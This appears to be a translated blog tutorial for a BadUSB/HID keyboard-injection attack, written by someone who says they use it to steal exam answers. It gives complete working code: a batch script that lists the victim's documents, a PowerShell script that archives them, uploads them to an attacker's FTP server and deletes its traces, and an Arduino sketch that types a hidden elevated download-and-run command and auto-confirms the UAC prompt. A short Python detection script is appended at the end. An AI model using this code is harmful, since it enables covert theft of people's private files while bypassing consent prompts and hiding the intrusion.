HID Advanced Attack posture: How to Use PowerShell scripts to steal files
0x01 Introduction
After the mid-term exam, I had to steal the answers again. I found that the method of remotely downloading and running an exe is not very good and easily gets flagged as a virus, so I plan to use a ps script here.
0x02 About HID
HID is short for Human Interface Device. The name suggests a device that interacts directly with a person, such as a keyboard, mouse or joystick. A HID device does not have to be a human-machine interface, though: any device that complies with the HID class specification is a HID device. Attacks against HID mostly target the keyboard and mouse, because whoever controls the user's keyboard essentially controls the user's computer. An attacker can hide the attack inside a normal-looking mouse or keyboard; when the user plugs the device carrying the attack payload into a computer, the malicious code is loaded and executed.
0x03 Preparation tools
An Internet-facing host (a computer connected by network cable with broadband dial-up will do)
A HID attack tool (a "roast goose" board or BadUSB)
FTP server (set up an FTP server to receive the stolen files)
PHPstudy (set up an HTTP server to host the ps scripts, etc.)
7z.exe/7z.dll (stored on the HTTP server; the files are compressed before upload to keep the upload as short as possible)
0x04 Code Section (the following code is offensive and must not be used for illegal purposes)
1. [get.bat] (collects the locations of the wanted files and saves the list to c:\temp.bat) [this code is stored in the http root directory of the server]
dir /s /a /b "%userprofile%\desktop\*.txt">c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.doc">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.docx">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.xls">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.xlsx">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.ppt">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.eet">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.et">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.xlt">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.pdf">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.jpg">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.jpeg">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.png">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.bmp">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.gif">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.rtf">>c:\temp.bat
dir /s /a /b "%userprofile%\desktop\*.htl">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.txt">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.doc">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.docx">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.xls">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.xlsx">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.ppt">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.eet">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.et">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.xlt">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.pdf">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.jpg">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.jpeg">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.png">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.bmp">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.gif">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.rtf">>c:\temp.bat
dir /s /a /b "%userprofile%\Documents\Tencent Files\*.htl">>c:\temp.bat
2. [get.ps1] (clears the Run-dialog history, downloads 7z.dll/7z.exe/get.bat from the server to the corresponding locations on drive C, runs get.bat, 7z-compresses every path listed in c:\temp.bat into c:\Ram.7z, uploads c:\Ram.7z to the FTP server root directory and deletes all downloaded files!!! A total of four IP addresses need to be changed!!!) [This code is stored in the http root directory of the server. Remember to set the FTP server password to admin.]
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f;   # clear the Run-dialog history
(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/7z.dll','c:\7z.dll');
(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/7z.exe','c:\7z.exe');
(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/get.bat','c:\Users\Public\get.bat');
C:\Users\Public\get.bat   # writes the file list to c:\temp.bat
# turn every listed path into a 7z "add" command, then run the rewritten batch file
$array = ""
foreach ($u in (Get-Content c:\temp.bat)) { [array]$array += 'c:\7z a -t7z c:\Ram.7z "' + $u + '"' }
$array | Out-File -Encoding default c:\temp.bat
c:\temp.bat
# upload c:\Ram.7z to the FTP root
$fileinf = New-Object System.IO.FileInfo("C:\Ram.7z")
$ftp = [System.Net.FtpWebRequest]::Create("ftp://192.168.1.1/" + $fileinf.Name)
$ftp.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile
$ftp.Credentials = New-Object System.Net.NetworkCredential("admin","admin")
$ftp.UseBinary = $true
$ftp.UsePassive = $true
$content = [System.IO.File]::ReadAllBytes($fileinf.FullName)
$ftp.ContentLength = $content.Length
$rs = $ftp.GetRequestStream()
$rs.Write($content, 0, $content.Length)
$rs.Close()
$rs.Dispose()
# remove everything that was downloaded or generated
Remove-Item c:\temp.bat
Remove-Item c:\Ram.*
Remove-Item c:\7z.*
Remove-Item c:\Users\Public\get.*
3. [get.ino] (downloads get.ps1 as administrator to the local c:\users\public directory and runs it!!! One IP address needs to be changed!!! After the UAC prompt flashes by, remember to unplug the device.) [flash it to the board directly after modifying]
#include <Keyboard.h>

void setup() { // initialization
  Keyboard.begin(); // start keyboard communication
  delay(5000); // wait for the host to enumerate the device
  Keyboard.press(KEY_LEFT_GUI); // Win key
  delay(500);
  Keyboard.press('R'); // r key (Win+R opens the Run dialog)
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK); // toggle Caps Lock: the upper-case strings below are typed in inverted case
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500);
  Keyboard.println("POWERSHELL -NOP");
  delay(800);
  Keyboard.println();
  delay(800);
  Keyboard.println("START-PROCESS -fILEpATH POWERSHELL \" -NOP -W HIDDEN -C SET-eXECUTIONpOLICY rEMOTEsIGNED -FORCE;CD $ENV:PUBLIC;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE(\'HTTP://192.168.1.1/GET.PS1\',\'C:\\USERS\\PUBLIC\\GET.PS1\');./GET.PS1;EXIT\" -vERB RUNAS;EXIT");
  Keyboard.press(KEY_CAPS_LOCK); // toggle Caps Lock back
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end(); // end keyboard communication
}

void loop() { // keep sending Alt+Y so the UAC prompt is confirmed as soon as it appears
  Keyboard.release(KEY_LEFT_ALT);
  Keyboard.press(KEY_LEFT_ALT);
  Keyboard.print('y');
  Keyboard.release(KEY_LEFT_ALT);
  delay(50);
}
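As an added defender's example (not code from the original post), the following Python scores process-creation records for the command-line chain the three steps above produce: a no-profile PowerShell, a hidden-window PowerShell child spawned from it, a Set-ExecutionPolicy change and a WebClient download cradle into the Public directory. The sample records are constructed, and the indicator names are my own.

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry). The third mirrors
# the command line the Arduino sketch types: because Caps Lock is toggled first, every
# indicator arrives in inverted case, so a case-sensitive rule would miss it.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.docx"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "POWERSHELL -NOP"},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": ("POWERSHELL -NOP -W HIDDEN -C SET-eXECUTIONpOLICY rEMOTEsIGNED -FORCE;"
                     "CD $ENV:PUBLIC;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE("
                     "'HTTP://192.168.1.1/GET.PS1','C:\\USERS\\PUBLIC\\GET.PS1');./GET.PS1;EXIT")},
]

# Indicator names are my own; every pattern is applied case-insensitively.
INDICATORS = {
    "noprofile": r"-no?p(rofile)?\b",
    "hidden_window": r"-w(indowstyle)?\s+hidden",
    "execpolicy_change": r"set-executionpolicy",
    "download_cradle": r"net\.webclient\)\s*\.\s*downloadfile",
    "public_dir": r"\$env:public|\\users\\public\\",
}


def is_powershell(path):
    return path.lower().endswith("\\powershell.exe")


def score_event(event):
    """Return the matched indicators plus a verdict for one process-creation record."""
    cmd = event["CommandLine"]
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, cmd, re.IGNORECASE)]
    # PowerShell spawning PowerShell is the hand-off the sketch relies on (Start-Process -Verb RunAs)
    nested = is_powershell(event["Image"]) and is_powershell(event["ParentImage"])
    # a download cradle alone is worth a look; otherwise require several indicators together
    suspicious = "download_cradle" in hits or len(hits) >= 3
    return {"hits": hits, "nested_powershell": nested, "suspicious": suspicious}


def triage(events):
    """Score every record; feed it parsed Sysmon ID 1 or Security 4688 events."""
    return [score_event(e) for e in events]


if __name__ == "__main__":
    for ev, result in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(result["suspicious"], result["hits"], ev["CommandLine"][:60])
```

The benign notepad record and the bare "POWERSHELL -NOP" record score clean, while the hidden-window child is flagged on all five indicators and on the PowerShell-in-PowerShell parentage.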